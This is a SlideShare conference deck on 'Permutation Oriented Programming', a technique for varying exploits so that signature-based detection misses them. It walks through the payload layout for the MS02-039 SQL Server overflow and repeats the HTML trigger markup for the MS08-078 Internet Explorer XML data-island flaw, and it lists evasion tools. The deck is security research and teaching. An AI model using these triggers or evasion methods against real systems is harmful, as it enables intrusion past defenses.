Permutation Oriented Programming: (Re)searching for alternatives!

552
-1

Published on

Permutation Oriented Programming is the simplest way to avoid security solution detection and shows the Pattern Matching technology weakness. This slide-deck version contains further details of my technique to bypass one of the workarounds recommended by Microsoft (Disable XML Island functionality).

For further details and example codes, please, refer to:
http://code.google.com/p/permutation-oriented-programming/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
552
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Permutation Oriented Programming: (Re)searching for alternatives!

  1. 1. Agenda• 0000 – A long time ago… • 0100 – Demonstration• 0001 – Introduction • 0101 – Conclusions• 0010 – Brain at work • 0110 – Testimonial• 0011 – Approach • 0111 – Questions and Answers
  2. 2. nbrito@pitbull:~$ whoami• Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI• Home town: • Rio de Janeiro• Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™• WEB: • http://about.me/nbrito
  3. 3. A long time ago, in a galaxy far, far away…
  4. 4. Before starting0-Day Pattern-matching• 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this.• Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation.• So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection• Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
  5. 5. Some conceptsExploitation Vulnerability• There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to• This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc.• The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register,• All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
  6. 6. Current evasion techniques (a.k.a. TT)Techniques Tools• Packet fragmentation • Fragroute / Fragrouter / Sniffjoke• Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others• Byte and traffic insertion • Whisker / Nikto / Sandcat• Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others• Denial of Service • Sidestep / RPC-evade-poc.pl / Others• URL obfuscation (+ SSL encryption) • Predator (AET)• RPC fragmentation • Etc…• HTML and JavaScript obfuscation• Etc…
  7. 7. What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching• People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit• But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation.• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  8. 8. What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching• People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit• But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation.• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  9. 9. What is Permutation Oriented Programming?The scenario The technique• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected• This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem).• Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching• People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit• But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation.• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
  10. 10. POP (pronounced /pŏp/) techniqueThe truth The examples• POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode. – MS02-039: CVE-2002-0649/CWE-120. – MS02-056: CVE-2002-1123/CWE-120.• POP is neither a new polymorphic shellcode technique, nor an obfuscation technique: • Client-side vulnerabilities: – Shellcode is the last thing the exploitation – MS08-078: CVE-2008-4844/CWE-367. and/or detection should care about. – MS09-002: CVE-2009-0075/CWE-367. – Obfuscation is not an elegant technique to apply to an exploitation. • Windows 32-bit shellcodes:• POP technique can be applied to work with Rapid7 – 波動拳: “CMD /k”. Metasploit Framework, CORE Impact Pro, Immunity – 昇龍拳: “CMD /k set DIRCMD=/b”. CANVAS Professional, and regular stand-alone proof-of-concepts (freestyle coding). • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also• POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
  11. 11. What if… exploit #1
  12. 12. What if… exploit #1 exploit #2
  13. 13. What if… exploit #1exploit #N exploit #2
  14. 14. What if… exploit #1exploit #N exploit #2 shared zone
  15. 15. What if… exploit #1exploit #N exploit #2 shared zone
  16. 16. What if… exploit #1exploit #N exploit #2 shared zone Permutation Oriented Programming
  17. 17. VulnerabilitiesMS02-039 MS08-078• Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844.• Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367.• CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH).• Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2.• Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
  18. 18. VulnerabilitiesMS02-039 MS08-078• Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844.• Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367.• CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH).• Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2.• Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
  19. 19. CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  20. 20. memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  21. 21. memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  22. 22. memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  23. 23. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  24. 24. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  25. 25. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  26. 26. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  27. 27. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  28. 28. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  29. 29. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  30. 30. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  31. 31. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  32. 32. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  33. 33. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  34. 34. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  35. 35. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  36. 36. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  37. 37. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  38. 38. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  39. 39. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  40. 40. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  41. 41. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  42. 42. <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  43. 43. memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  44. 44. memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  45. 45. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  46. 46. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  47. 47. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  48. 48. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  49. 49. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  50. 50. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  51. 51. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  52. 52. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  53. 53. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  54. 54. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  55. 55. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  56. 56. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  57. 57. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  58. 58. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  59. 59. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  60. 60. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  61. 61. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  62. 62. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  63. 63. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  64. 64. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  65. 65. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  66. 66. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  67. 67. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  68. 68. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  69. 69. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  70. 70. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
